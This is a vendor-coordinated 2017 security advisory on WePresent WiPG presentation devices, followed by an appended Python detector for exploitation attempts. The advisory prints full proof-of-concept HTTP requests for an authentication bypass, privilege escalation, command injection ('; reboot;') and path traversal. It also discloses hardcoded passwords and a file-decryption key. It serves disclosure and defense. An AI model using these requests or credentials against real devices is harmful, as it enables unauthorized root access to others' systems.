Security Advisory: Multiple vulnerabilities in WePresent WiPG devices
--------------------------------------------------------------------------------

1. Summary

This advisory describes multiple vulnerabilities affecting the WePresent WiPG devices. Most of the issues covered by this advisory apply to the WiPG-1000, WiPG-1500 and WiPG-2000. The vulnerabilities allow an unauthenticated attacker on the same network as the device to gain administrative access to its web interface and to execute arbitrary code with root privileges on the device.

2. Vulnerable devices and versions

All vulnerabilities were discovered on the WiPG-1000 device and are likely to be present on the WiPG-1500 and WiPG-2000 as well, but this has not been verified in all cases. The most current firmware version at the time of writing (2.0.0.7) was used for the vulnerability research; quick cross-checks indicated that many of the vulnerabilities were present in much older firmware versions as well.

3. Details

3.1 Web Interface Authentication Bypass

The login.cgi script contains the hardcoded password 'aw%root?' (without quotes) for the administration area. This allows anyone with access to the network (or anyone at all, if the device is exposed to the internet) to log in without knowing the password set by the regular administrator. The administration area should only be accessible to someone in possession of the password the administrator chose. Note also that no user is able to change this hardcoded password; the only way to get rid of it is to apply a firmware version that no longer contains it.

Note: This backdoor does not appear to be present in the WiPG-2000 device.
3.2 Web Interface Privilege Escalation

When the administrator's password is changed in the web form, the following request is sent:

---
POST /cgi-bin/return_test.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 96
Cache-Control: no-cache
Origin: http://192.168.100.10
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: */*
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close

command=Y5orvHOhpS3nxe9eLONG_ADMIN_PWD newpassword
---

If a user logs into the conference control panel on the web UI and then sends this exact request with their own session ID substituted (the ID is plainly visible in the URL after logging in), the password is changed to the new value. The attacker can then log in as administrator and has thus escalated the user's privileges.

Note: The underlying issue is that the session management does not differentiate between administrative and moderator users. The difference is handled entirely at the UI level, by not showing moderator users direct links to the administrative pages; their session is nevertheless valid for administrative access.

3.3 Authentication Bypass

The return_test.cgi script (/home/boa/cgi-bin/return_test.cgi) handles various user requests, such as updating device preferences (or changing passwords, as seen in the previous vulnerability). The request body is in a pseudo-XML format whose first field, value, contains the current session ID; this ID is used to verify that the request came from a legitimate user. If the request is manipulated so that the string 'SetFlag' is sent in place of 'session-id-here', the device omits the session ID check for this request and handles it as though it came from an authenticated user.
See below for a full proof of concept request:

---
POST /cgi-bin/return_test.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 1308
Cache-Control: no-cache
Origin: http://192.168.100.10
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: */*
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close

command=SetFlagNET_IP_TYPE 1NET_DHCP_EN1 NET_IPredactedNET_MASK redactedNET_GATEWAYredacted NET_DNSredactedWL_ESSID WiPG-1000WL_SWITCH0 WL_SSID_BROADCAST1WL_MODE 9WL_CHANNEL0WL_ENCRYPT 14WL_WPAKEYredacted WL_BANDWIDTH1APCLIENT_ONOFF 1APCLIENT_ESSIDredacted APCLIENT_ENCRYPT_MODE7 APCLIENT_ENCRYPT_KEYredacted SNMP_USER_NAMEadminSNMP_AUTH_PASSWORD AuthadminSNMP_PRIV_PASSWORDPrivadmin SNMPTRAPHOST0.0.0.0SNMP_ONOFF 1PREF_GATEKEEPER1 NTP_SYNC1NTP_SERVER_IP TIME_ZONEGMT-8_CHDOMAIN_NAME
---

3.4 OS Command Injection

The rdfs.cgi script (/home/boa/cgi-bin/rdfs.cgi) is vulnerable to command injection. A specially crafted string in the web form leads to arbitrary shell commands being executed on the device with root privileges. As a simple proof of concept, insert the string `; reboot;` into the input field and press the download button. The device executes the command and reboots.
The cause of this vulnerability is that the user-supplied string is inserted into the following command, which is then executed:

'/bin/awenc -e -i %s -o %s'

See below for a full proof of concept request:

---
POST /cgi-bin/rdfs.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 37
Cache-Control: max-age=0
Origin: http://192.168.100.10
Upgrade-Insecure-Requests: 1
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close

Client=%3Breboot%3B&Download=Download
---

Note: This script is assumed to be a development leftover, as it does not appear to be presented to end users in any way during normal usage. If this is the case, it should be removed from the system entirely.

3.5 Arbitrary File Disclosure

The intended functionality of the rdfs.cgi script (/home/boa/cgi-bin/rdfs.cgi) is to download an arbitrary file from the device. The encryption that is applied (the call to the /bin/awenc binary seen in the command injection vulnerability above) is too weak to be a significant obstacle to exploiting this vulnerability. It can easily be reversed by removing the first 512 bytes of an encrypted file and then shifting the remaining bytes by the hex values of the hardcoded key, which is '28825885"(("%((%mistral28825885' (without the single quotes). As there is no limitation on which file can be downloaded through this feature, an attacker can download any file in encrypted form and then easily recover its contents. This is particularly interesting because the cleartext passwords chosen for the admin and moderator users, as well as the WiFi key, can be read by downloading the file '/tmp/scfgdndf'.

3.6 File Inclusion

The login.cgi script (/home/boa/cgi-bin/login.cgi) contains a file inclusion vulnerability in the 'src' parameter.
The file inclusion only appears to work for files meeting certain criteria, however; a 502 error is returned for other files. The URL 'http://192.168.100.10/cgi-bin/login.cgi?lang=en&src=../../../bin/mountstor.sh' can be used as a proof of concept. This vulnerability does not appear to have any severe impact, as we were not able to read any files containing information that could not be gained by simply extracting them from the firmware.

3.7 Insecure Maintenance Interface

Requesting the URL 'http://192.168.100.10/cgi-bin/login.cgi?lang=en&src=AwLoginRdtool.html' leads to a login page being served by login.cgi which allows anyone to log in as 'rdtool' using the hardcoded password 'mistral5885'. Once logged in, one can enable 'manufacture mode' or 'RD Debug mode', which enables the Telnet service on the device. The researchers were unable to discover the password for the root account during the time spent on this research; however, anyone in possession of the password can enable Telnet and get a shell with root privileges on the device.

4. Credits

* Matthias Brun (main researcher)
* Sven Vetsch
* Dominik Nufer

5. Timeline

* 2017-02-17 Made initial contact with vendor.
* 2017-02-20 Sent advisory to vendor and received confirmation of receipt.
* 2017-03-20 Asked about status. Vendor confirmed the issues have been triaged and are being fixed.
* 2017-03-27 Received answer confirming that all items have been fixed.
* 2017-04-09 Firmware version 2.2.3.0 released, fixing (according to the vendor) all disclosed vulnerabilities.
* 2017-04-20 Public disclosure of advisory.

6. About Redguard

Redguard is a Swiss-based information security company. We assist our clients with technical security testing as well as organisational security audits and consulting. This gives us a team with extensive experience in a wide variety of security-relevant topics.

https://www.redguard.ch
contact@redguard.ch

7. Disclaimer

This document is not meant to be a complete list of security issues for any of the mentioned devices and/or versions. It is possible, and indeed likely, that there are further security issues that are yet to be identified. The information in this advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
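Detection example added by the editor; it is not part of the Redguard advisory and not the vendor's code. It parses raw HTTP requests of the shape shown in the proofs of concept above (request line, headers, URL-encoded body) and flags the request patterns from sections 3.2 to 3.7 so that a proxy or IDS log can be checked for exploitation attempts. The sample requests are constructed from the advisory and the finding labels are the editor's own.

```python
import re
from urllib.parse import parse_qs, urlsplit

SHELL_META = re.compile(r"[;|&`$\n]")  # characters that break out of a system() command line

def parse_request(raw):  # -> (method, path, query params, form params)
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _version = head.split("\r\n", 1)[0].split(" ", 2)
    parts = urlsplit(target)

    def first(qs):  # keep the first value of each parameter; parse_qs also %-decodes
        return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}
    return method, parts.path, first(parts.query), first(body)

def classify(raw):  # -> list of advisory findings the request matches (empty if none)
    _method, path, query, form = parse_request(raw)
    findings = []
    if path.endswith("/rdfs.cgi"):
        findings.append("3.4/3.5: rdfs.cgi reached (development leftover, should not be exposed)")
        if SHELL_META.search(form.get("Client", "")):
            findings.append("3.4: OS command injection attempt in rdfs.cgi 'Client' field")
    elif path.endswith("/return_test.cgi"):
        command = form.get("command", "")
        if command.startswith("SetFlag"):
            findings.append("3.3: SetFlag sent in place of session ID (authentication bypass)")
        if "LONG_ADMIN_PWD" in command:
            findings.append("3.2: admin password change; confirm the session belongs to an admin")
    elif path.endswith("/login.cgi"):
        src = query.get("src", "")
        if ".." in src or src.startswith("/"):
            findings.append("3.6: path traversal in login.cgi 'src' parameter")
        if src == "AwLoginRdtool.html":
            findings.append("3.7: rdtool maintenance login page requested")
    return findings

def req(line, body=""):  # minimal raw request using the advisory's Host header
    return f"{line} HTTP/1.1\r\nHost: 192.168.100.10\r\n\r\n{body}"

SAMPLES = {  # constructed from the advisory's proofs of concept, not real captures
    "cmdinj": req("POST /cgi-bin/rdfs.cgi", "Client=%3Breboot%3B&Download=Download"),
    "setflag": req("POST /cgi-bin/return_test.cgi", "command=SetFlagNET_IP_TYPE1NET_DHCP_EN1"),
    "pwchange": req("POST /cgi-bin/return_test.cgi", "command=Y5orvHOhpS3nxe9eLONG_ADMIN_PWDnewpassword"),
    "lfi": req("GET /cgi-bin/login.cgi?lang=en&src=../../../bin/mountstor.sh"),
    "rdtool": req("GET /cgi-bin/login.cgi?lang=en&src=AwLoginRdtool.html"),
    "benign": req("GET /cgi-bin/login.cgi?lang=en"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:9s} -> {classify(raw) or ['no finding']}")
```

Feed it full request records (body included) from a reverse proxy or IDS in front of the device; plain access logs lack the POST bodies that the 3.2 and 3.3 checks rely on.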